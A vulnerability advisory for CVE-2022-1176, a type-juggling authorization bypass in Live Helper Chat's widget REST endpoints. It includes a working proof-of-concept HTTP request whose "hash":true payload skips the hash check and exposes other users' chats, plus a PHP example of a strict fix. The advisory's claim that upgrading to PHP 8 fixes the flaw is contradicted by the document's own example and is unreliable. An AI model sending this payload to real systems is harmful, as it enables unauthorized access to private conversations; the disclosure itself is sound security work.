Headline
CVE-2022-1176: Loose comparison causes IDOR on multiple endpoints in livehelperchat
Loose comparison causes IDOR on multiple endpoints in GitHub repository livehelperchat/livehelperchat prior to 3.96.
Description
Live Helper Chat is vulnerable to Type Juggling on the requestPayload['hash'] parameter. The application uses a Loose Comparison (==) to check whether the user-controlled parameter equals a stored hash; this check is vulnerable because it is possible to pass other data types via JSON that cause the if condition to evaluate to true. This occurs on multiple endpoints.
Proof of Concept
For the PoC, the vulnerable check resides at https://github.com/LiveHelperChat/livehelperchat/blob/master/lhc_web/modules/lhwidgetrestapi/fetchmessage.php#L19
if ($chat instanceof erLhcoreClassModelChat && $chat->hash == $requestPayload['hash'])
Request
POST /eng/widgetrestapi/fetchmessages HTTP/1.1
Host: demo.livehelperchat.com
Cookie: lhc_vid=eb9bc0c044919538c5b1
Content-Length: 62
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99"
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://demo.livehelperchat.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.livehelperchat.com/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"chat_id":2,"hash":true,"lmgsid":1,"theme":1,"new_chat":true}
Note the "hash":true in the body; this makes the if condition always evaluate to true.
The loose comparison can be fixed by using a type-safe check (===) or by updating to PHP 8 or later.
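A minimal side-by-side of the loose check and a hardened replacement, as an added example that is not code from the livehelperchat project; ChatRecord and the hash value are constructed stand-ins for erLhcoreClassModelChat and its stored hash, and PHP 8 syntax is assumed.

```php
<?php
// Added example, not livehelperchat code: reproduces the loose-comparison
// check on a hash-protected chat record and contrasts it with a strict check.
declare(strict_types=1);

/** Constructed stand-in for erLhcoreClassModelChat (only the hash field). */
final class ChatRecord
{
    public function __construct(public string $hash) {}
}

/** Vulnerable form: the == comparison used by the pre-3.96 endpoints. */
function hashMatchesLoose(ChatRecord $chat, mixed $supplied): bool
{
    return $chat->hash == $supplied;
}

/**
 * Hardened form: reject anything that is not a string, then compare with
 * hash_equals() so the check is both type-safe and constant-time.
 */
function hashMatchesStrict(ChatRecord $chat, mixed $supplied): bool
{
    return is_string($supplied) && hash_equals($chat->hash, $supplied);
}

$chat = new ChatRecord('e3b0c44298fc1c149afb'); // constructed hash value

// Request bodies as the widget REST API would json_decode() them.
$payloads = [
    '{"chat_id":2,"hash":"e3b0c44298fc1c149afb"}', // legitimate client
    '{"chat_id":2,"hash":"wrong"}',                 // wrong hash, must fail
    '{"chat_id":2,"hash":true}',                    // the PoC payload
];

foreach ($payloads as $body) {
    $req = json_decode($body, true);
    // Expected: loose=true/false/true, strict=true/false/false.
    // A non-empty string compared with a bool is cast to bool, so the
    // loose check accepts "hash":true on PHP 7 and PHP 8 alike; the PHP 8
    // comparison change only covers string-versus-number comparisons.
    printf("%-45s loose=%-5s strict=%s\n", $body,
        hashMatchesLoose($chat, $req['hash']) ? 'true' : 'false',
        hashMatchesStrict($chat, $req['hash']) ? 'true' : 'false');
}
```

Because the bool case survives the PHP 8 upgrade, the === (or is_string plus hash_equals) change is the part of the fix that actually closes the PoC; the version bump alone is not sufficient for this payload.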
I've attached more occurrences of the same vulnerability:
modules/lhwidgetrestapi/fetchmessage.php
modules/lhwidgetrestapi/fetchmessages.php
modules/lhwidgetrestapi/getmessagesnippet.php
modules/lhwidgetrestapi/initchat.php
modules/lhwidgetrestapi/uisettings.php
Impact
It's possible to bypass multiple hash checks. An attacker could access private information belonging to other users' chats.
Occurrences